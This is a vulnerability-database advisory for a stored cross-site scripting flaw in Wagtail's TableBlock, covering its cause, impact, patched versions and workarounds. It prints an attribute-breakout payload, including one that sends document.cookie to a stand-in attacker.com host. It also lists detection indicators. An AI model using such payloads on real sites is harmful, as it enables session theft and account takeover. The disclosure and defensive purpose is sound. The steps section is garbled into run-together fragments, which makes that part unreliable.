
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-28222 is a stored Cross-Site Scripting (XSS) vulnerability in Wagtail's TableBlock StreamField component, classified as Moderate severity. An authenticated user with access to create or edit pages containing TableBlock blocks can inject specially-crafted class attributes that execute arbitrary JavaScript when the page is rendered. The vulnerability was reported by Guan Chenxian (@GCXWLP), published on March 3, 2026, and affects Wagtail versions before 6.3.8, 6.4.x through 7.0.5, 7.1.x through 7.2.2, and 7.3/7.3-rc1. It carries a CVSS v3.1 base score of 6.1 (Medium) (Github Advisory).
The root cause is improper neutralization of user-controlled input during HTML generation (CWE-79). Specifically, the table_block_tags.py template tag used Django's mark_safe() to render cell class, rowspan, and colspan attributes without escaping, allowing an attacker to break out of the attribute context and inject event handlers or other HTML. For example, a className value of x" onmouseover="alert(1337)" data-pwn="1 would be rendered verbatim into the HTML output. The fix replaces mark_safe() with Django's format_html(), which properly escapes special characters (Github Advisory, Patch Commit).
Successful exploitation allows an attacker with Wagtail admin editing privileges to store malicious JavaScript that executes in the browser of any user who views the affected page. When the victim is a higher-privileged user (e.g., an administrator or editor), the injected script runs with that user's session credentials, enabling actions such as account takeover, unauthorized content modification, or credential harvesting. Availability is not impacted, but confidentiality and integrity are both rated High due to the potential for privilege escalation within the CMS (Github Advisory).
No public proof-of-concept exploit code is known to exist, and there is no evidence of in-the-wild exploitation at this time. The vulnerability requires an authenticated attacker with Wagtail admin page-editing permissions, limiting the attack surface to insider threats or compromised editor accounts. The EPSS score is approximately 0.046% (0.113% per GitHub Advisory), placing it in the 29th percentile for exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory).
TableBlock StreamField blocks (e.g., through a compromised credential or insider access).TableBlock within a StreamField.className field to a payload that breaks out of the attribute context, such as: x" onmouseover="fetch('https://attacker.com/?c='+document.cookie)" data-x="className values containing quote characters ("), event handler keywords (onmouseover, onclick, onerror), or JavaScript URIs in TableBlock cell data.TableBlock StreamField JSON data in the Wagtail page revision table for cell entries with className values containing HTML special characters or JavaScript event attributes.TableBlock content, potentially carrying cookie or session data in query parameters.Upgrade to one of the patched releases: Wagtail 6.3.8 (for 6.3.x), 7.0.6 (for 6.4–7.0.x), 7.2.3 (for 7.1–7.2.x), or 7.3.1 (for 7.3.x). For sites unable to upgrade immediately, a workaround is available: set a custom template attribute on all TableBlock definitions referencing a template that does not output class attributes. Additionally, restrict page creation and editing permissions to trusted users only, and audit existing pages using TableBlock for suspicious className values in cell data (Github Advisory).
The vulnerability was reported by security researcher Guan Chenxian (@GCXWLP) and remediated by the Wagtail core team (gasman). The advisory was reviewed and published promptly on the same day it was submitted (March 3, 2026), reflecting the Wagtail project's established security disclosure process. No significant broader media coverage or notable community controversy has been observed beyond the standard advisory publication (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."